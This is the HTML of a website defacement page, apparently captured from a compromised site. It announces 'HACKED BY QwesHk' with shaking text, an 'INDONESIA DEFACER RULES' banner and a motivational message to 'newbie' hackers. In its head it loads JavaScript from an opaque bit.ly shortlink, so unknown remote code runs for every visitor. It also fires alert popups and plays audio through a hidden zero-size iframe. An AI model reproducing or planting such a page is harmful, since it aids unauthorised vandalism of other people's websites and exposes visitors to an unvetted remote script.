http://ollell.mooo.com/<html>
	<head>
<title>HACKED BY QwesHk</title>
<meta name="description" content="WE ARE NEWBIE "> 
  <link rel="icon" href="https://a.top4top.io/p_1685l610h0.jpeg" type="image/x-icon"> 
  <meta name="keywords" content=" QwesHk"> 
  <meta name="author" content=" QwesHk"> 
<style>
	@import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");
	body {
		background: url(https://i.pinimg.com/originals/3a/8c/46/3a8c468e6b429f7caea4c7e340f8230d.gif) ;
		}
	  @keyframes shake {
	2%{color:#fff;}

3%{transform:translate(2px,-10px) skewX(3240deg);}

5%{transform:translate(0px,0px) skewX(0deg);}

2% , 54%{transform:translateX(0px) skew(0deg);}

55%{transform:translate(-2px,6px) skew(-5530deg);}

56%{transform:translate(0px,0px) skew(0deg);}

57%{transform:translate(4px,-10px) skew(-70deg);}

58%{transform:translate(0px,0px) skew(0deg);}

62%{transform:translate(0px,20px) skew(0deg);}

63%{transform:translate(4px,-2px) skew(0deg);}

90%{transform:translate(1px,3px); skew(-230deg);}

95%{transform:translate(-7px,2px); skew(-120deg);}

100%{transform:translate(0px,0px) skew(0deg);}
}
.root{
    animation: shake 0.5s linear infinite;
    animation-iteration-count: infinite;
    font-family: 'Shadow Into Light',cursive;
    color: white;
    font-size: 50px;
  }
  .coksc{
    font-family: 'Shadow Into Light', cursive;
    color: white;
    font-size: 18px;
  }
</style>
<script src='http://bit.ly/mrzhu-bunga' type='text/javascript'/></script>
<script>alert(" HACKED BY QwesHk ")</script>
<script>alert(" PUN10 SLUR/ADMIN ")</script>
<script>alert(" WE ARE NOT MASTAH ")</script>
<head>
	<body>
<center>
<img src='https://f.top4top.io/p_1685olw770.jpeg' style="width:500px;"><br>
<hr>
<div class="root" color="red"><b></>!HACKED BY!</></b></div>
<br>
<div class="root"> <font Color="red" size="9" > ./<font color="white"><b>QwesHk</b></font></div><hr></font>
<div class="coksc"><font color="red" style="font-size:44px;">#</font><font face="Rancho" color="white" style="font-size:44px;"> INDONESIA DEFACER RULES</font><font style="font-size:44px;" color='red'>#</font><font face="Rancho" color="white" style="font-size:38px;"><br><br>WE ARE NOT MASTAH<br><font size=5 color="red"> Belajarlah dari Seorang Newbie yang tidak pernah Mennyerah<br>Karna Seorang Mastah yang Hebat Berasal dari newbie<br>yang tidak pernah menyerah</font> <font>
</font><br>
<br>
<div id="clock" style="color: white; font-family: courier new;"></div>
    <script type="text/javascript">
    <!--
    function showTime() {
        var a_p = "";
        var today = new Date();
        var curr_hour = today.getHours();
        var curr_minute = today.getMinutes();
        var curr_second = today.getSeconds();
        if (curr_hour < 12) {
            a_p = "AM";
        } else {
            a_p = "PM";
        }
        if (curr_hour == 0) {
            curr_hour = 12;
        }
        if (curr_hour > 12) {
            curr_hour = curr_hour - 12;
        }
        curr_hour = checkTime(curr_hour);
        curr_minute = checkTime(curr_minute);
        curr_second = checkTime(curr_second);
     document.getElementById('clock').innerHTML=curr_hour + ":" + curr_minute + ":" + curr_second + " " + a_p;
        }
    function checkTime(i) {
        if (i < 10) {
            i = "0" + i;
        }
        return i;
    }
    setInterval(showTime, 500);
    //-->
    </script>
<br>
<font color="white" size="4">CopyRight- <font color="red">&copy; <font color="white">QwesHk</div>
<font size="5px" color="red" face="Rancho">[ </font><font face="Shadows Into Light Two" size="4px" color="white"><marquee behavior="alternate" direction="left" width="75%">IM NEWBIE</marquee></font><font size="5px" color="red" face="Rancho"> ]</font>
         </div>
<iframe width="0" height="0" src="https://b.top4top.io/m_1725uh8tc7.mp3" frameborder="0" allowfullscreen></iframe>
</center>
</font>
</body>
</html>
